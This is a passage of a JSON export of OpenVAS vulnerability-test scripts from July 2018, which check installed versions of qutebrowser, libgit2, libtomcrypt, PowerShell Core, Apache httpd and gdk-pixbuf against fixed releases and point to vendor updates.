PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874831\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:49 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10895\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qutebrowser FEDORA-2018-61dbd4a787\");\n script_tag(name:\"summary\", value:\"Check the version of qutebrowser\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present \non the target host.\");\n script_tag(name:\"insight\", value:\"qutebrowser is a keyboard-focused browser \nwith a minimal GUI. Its based on Python, PyQt5 and QtWebEngine and free software, \nlicensed under the GPL. It was inspired by other browsers/addons like dwb and \nVimperator/Pentadactyl.\");\n script_tag(name:\"affected\", value:\"qutebrowser on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-61dbd4a787\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUTKBGSXO6TYR6MTBCSU3R2ZU7Y6FNZU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"qutebrowser\", rpm:\"qutebrowser~1.4.1~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:43:27", "references": ["https://github.com/PowerShell/Announcements/issues/6", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8356", "https://github.com/PowerShell/PowerShell"], "pluginID": "1361412562310813698", "description": "This host is missing an important security\n update for PowerShell Core according to Microsoft security advisory\n CVE-2018-8356.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Microsoft PowerShell Core Security Feature Bypass Vulnerability July18 (Linux)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:27", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8356"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_powershell_sec_bypass_vuln_july18_lin.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Microsoft PowerShell Core Security Feature Bypass Vulnerability July18 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:powershell\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813698\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-8356\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 11:49:16 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Microsoft PowerShell Core Security Feature Bypass Vulnerability July18 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update for PowerShell Core according to Microsoft security advisory\n CVE-2018-8356.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of detect nvt and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when Microsoft .NET Framework \n components do not correctly validate certificates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers \n to present expired certificates when challenged.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"PowerShell Core versions 6.x prior to 6.0.3 \n and 6.1.x prior to 6.1.0-preview.4 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Update PowerShell Core to version 6.0.3 or \n 6.1.0-preview.4 or later. For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name : \"URL\" , value : \"https://github.com/PowerShell/PowerShell\");\n script_xref(name : \"URL\" , value : \"https://github.com/PowerShell/Announcements/issues/6\");\n script_xref(name : \"URL\" , value : \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8356\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_powershell_core_detect_lin.nasl\");\n script_mandatory_keys(\"PowerShell/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npsVer = infos['version'];\npsPath = infos['location'];\n\nif(version_in_range(version:psVer, test_version:\"6.0\", test_version2:\"6.0.2\")){\n fix = \"6.0.3\";\n}\n## 6.1.0-preview.4 = 6.1.0.4\nelse if(version_in_range(version:psVer, test_version:\"6.1\", test_version2:\"6.1.0.3\")){\n fix = \"6.1.0-preview.4\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:psVer, fixed_version:fix, install_path:psPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:42:25", "references": ["2018-fb071377ba", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GAR2S4GMRIEBQXZU3D6ZDJQTR5C4MZH"], "pluginID": "1361412562310874830", "description": "Check the version of libgit2", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Fedora Update for libgit2 FEDORA-2018-fb071377ba", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:42:25", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310874830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_fb071377ba_libgit2_fc27.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Fedora Update for libgit2 FEDORA-2018-fb071377ba\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874830\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:27 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-fb071377ba\");\n script_tag(name:\"summary\", value:\"Check the version of libgit2\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present \non the target host.\");\n script_tag(name:\"insight\", value:\"libgit2 is a portable, pure C implementation \nof the Git core methods provided as a re-entrant linkable library with a solid API, \nallowing you to write native speed custom Git applications in any language with \nbindings.\n\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-fb071377ba\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GAR2S4GMRIEBQXZU3D6ZDJQTR5C4MZH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.5~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-20T19:42:31", "references": ["2018-4d253dc945", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2DI7CXOAS5SSCDPWYHUDJEDPVLTAFS6H"], "pluginID": "1361412562310874827", "description": "Check the version of libgit2", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Fedora Update for libgit2 FEDORA-2018-4d253dc945", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:42:31", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310874827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874827", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_4d253dc945_libgit2_fc28.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Fedora Update for libgit2 FEDORA-2018-4d253dc945\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874827\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:04 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-4d253dc945\");\n script_tag(name:\"summary\", value:\"Check the version of libgit2\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is \npresent on the target host.\");\n script_tag(name:\"insight\", value:\"libgit2 is a portable, pure C implementation \nof the Git core methods provided as a re-entrant linkable library with a solid API, \nallowing you to write native speed custom Git applications in any language with \nbindings.\n\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-4d253dc945\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2DI7CXOAS5SSCDPWYHUDJEDPVLTAFS6H\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.5~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-20T19:42:51", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QK736OE4RNCZIYFQDERCQPXBRYI4AXA6", "2018-9d667bdff8"], "pluginID": "1361412562310874832", "description": "Check the version of libtomcrypt", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Fedora Update for libtomcrypt FEDORA-2018-9d667bdff8", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:42:51", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-12437", "CVE-2018-0739"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310874832", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874832", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_9d667bdff8_libtomcrypt_fc28.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Fedora Update for libtomcrypt FEDORA-2018-9d667bdff8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874832\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:52 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-12437\", \"CVE-2018-0739\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libtomcrypt FEDORA-2018-9d667bdff8\");\n script_tag(name:\"summary\", value:\"Check the version of libtomcrypt\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is \npresent on the target host.\");\n script_tag(name:\"insight\", value:\"A comprehensive, modular and portable \ncryptographic toolkit that provides developers with a vast array of well \nknown published block ciphers, one-way hash functions, chaining modes, \npseudo-random number generators, public key cryptography and a plethora of \nother routines.\n\nDesigned from the ground up to be very simple to use. It has a modular and\nstandard API that allows new ciphers, hashes and PRNGs to be added or removed\nwithout change to the overall end application. It features easy to use functions\nand a complete user manual which has many source snippet examples.\n\");\n script_tag(name:\"affected\", value:\"libtomcrypt on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-9d667bdff8\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QK736OE4RNCZIYFQDERCQPXBRYI4AXA6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libtomcrypt\", rpm:\"libtomcrypt~1.18.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-07-20T19:46:00", "references": ["http://seclists.org/oss-sec/2018/q3/40", "https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2018-8011"], "pluginID": "1361412562310813266", "description": "The host is installed with Apache HTTP server\n and is prone to denial of service vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Apache HTTP Server 'mod_md' Denial of Service Vulnerability (Linux)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:46:00", "vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8011"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813266", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_httpd_mod_md_challenge_handler_dos_vuln_lin.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Apache HTTP Server 'mod_md' Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details. \n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n############################################################################### \n\nCPE = \"cpe:/a:apache:http_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813266\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-8011\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 15:33:08 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Apache HTTP Server 'mod_md' Denial of Service Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apache HTTP server\n and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of the detect NVT and check if the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in 'mod_md'\n challenge handler.Which is not properly handling the specially crafting HTTP\n requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash the Apache HTTP Server and perform denial of service attack.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP server version 2.4.33 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.4.34 or later.\n For updates refer to Reference links.\");\n \n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2018/q3/40\");\n script_xref(name:\"URL\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2018-8011\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Host/runs_unixoide\", \"apache/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!hport = get_app_port(cpe: CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:hport, exit_no_version:TRUE)) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(vers == \"2.4.33\")\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.4.34\" , install_path:path);\n security_message(port:hport, data:report);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:44:42", "references": ["2018:2013_1", "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00025.html"], "pluginID": "1361412562310851817", "description": "Check the version of gdk-pixbuf", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "SuSE Update for gdk-pixbuf openSUSE-SU-2018:2013-1 (gdk-pixbuf)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:44:42", "vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000422"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310851817", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851817", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2018_2013_1.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# SuSE Update for gdk-pixbuf openSUSE-SU-2018:2013-1 (gdk-pixbuf)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851817\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 05:54:39 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2017-1000422\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for gdk-pixbuf openSUSE-SU-2018:2013-1 (gdk-pixbuf)\");\n script_tag(name:\"summary\", value:\"Check the version of gdk-pixbuf\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"\n This update for gdk-pixbuf fixes the following security issue:\n\n - CVE-2017-1000422: Prevent several integer overflow in the gif_get_lzw\n function resulting in memory corruption and potential code execution\n (bsc#1074462).\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended \n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-741=1\");\n script_tag(name:\"affected\", value:\"gdk-pixbuf on openSUSE Leap 42.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2013_1\");\n script_xref(name:\"URL\" , value:\"http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00025.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-debugsource\", rpm:\"gdk-pixbuf-debugsource~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-devel\", rpm:\"gdk-pixbuf-devel~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-devel-debuginfo\", rpm:\"gdk-pixbuf-devel-debuginfo~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-query-loaders\", rpm:\"gdk-pixbuf-query-loaders~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-query-loaders-debuginfo\", rpm:\"gdk-pixbuf-query-loaders-debuginfo~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgdk_pixbuf-2_0-0\", rpm:\"libgdk_pixbuf-2_0-0~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 